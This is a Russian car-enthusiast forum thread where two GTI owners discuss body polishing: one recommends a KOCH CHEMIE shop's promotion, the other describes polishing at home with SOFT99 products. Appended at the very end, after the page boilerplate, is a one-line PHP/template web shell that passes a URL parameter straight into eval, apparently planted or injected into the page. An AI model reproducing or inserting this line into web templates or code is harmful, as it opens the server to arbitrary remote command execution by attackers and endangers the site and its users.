+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Кому нужно хорошо отполировать кузов


  1. #1
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846

    Кому нужно хорошо отполировать кузов

    Недавно, после неудачных попыток оттереть битум с кузова уайт спиритом, машина покрылась желтыми пятнами, которые ничем не получалось удалить.

    Решил полироваться. В прошлом году был неудачный опыт полировки по купону в AVTO SPA, где мне сожгли краску на переднем бампере. В итоге, на парковке притерли и спасла каско.

    Наткнулся на полировку KOCH CHEMIE на Спортивной на подземной парковке элитного дома.

    Оказалось там акция идет - полная чистка, восстановительная полировка и жидкий лак на год. На наши носки 7 тыс р и оставляешь на сутки.

    Отполировали охрененно. Особенно шикарно смотрится фиолетовая эмка моего друга, которого я тоже сагитировал на эту контору.

    Не знаю, когда у них акуия эта кончается, но щас она вроде продолжается.

    http://koch24.ru/novosti/93-vesennya...ot-koch24.html

    Надеюсь кому-то это поможет

  2. #2
    GTI-Racing dvp is on a distinguished road Аватар для dvp
    Регистрация
    20.05.2013
    Откуда
    Самара
    Машина
    Овосч
    Сообщений
    33
    Занимаюсь полировкой сам. Не знаю как для Москвы, но мне самостоятельная полировка обходиться в среднем 800-1000 рублей с учетом закупки всего необходимого + вижу где косяки и как лучше это скрыть.

    Сейчас использую продукцию SOFT99. Если профессионально делать по несколько машин в неделю, скорее всего тоже перешел на KOCH или подобное...

    + добавлю что по акции они после абразивной полировки покрывают защитной и все. Рекомендовал бы для темных и насыщенных цветов еще покрыть составом для повышения блеска. Могут сделать даже несколько слоев, чтобы эффект был еще лучше.

    + напишу, что после полировки ЖЕЛАТЕЛЬНО неделю не мыть машину, пока окончательно не встанет полироль.

+ Ответить в теме

Похожие темы

  1. Ответов: 19
    Последнее сообщение: 02.04.2024, 00:57
  2. Как то не хорошо заводится 6 GTI!
    от Taim в разделе Golf 6
    Ответов: 26
    Последнее сообщение: 02.01.2024, 00:38
  3. Ответов: 0
    Последнее сообщение: 26.02.2014, 20:56
  4. Ответов: 0
    Последнее сообщение: 12.02.2014, 21:34
  5. Отдам кому нужно!
    от Дзынь в разделе Барахолка
    Ответов: 4
    Последнее сообщение: 16.05.2009, 00:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}